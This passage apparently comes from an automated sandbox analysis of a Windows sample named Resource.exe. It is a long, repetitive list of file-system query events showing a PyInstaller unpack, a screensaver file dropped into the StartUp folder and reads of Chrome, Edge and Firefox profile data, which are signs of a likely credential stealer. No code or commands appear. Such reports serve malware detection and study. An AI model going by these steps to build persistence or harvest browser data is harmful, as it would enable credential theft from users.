              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\Desktop\Resource.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
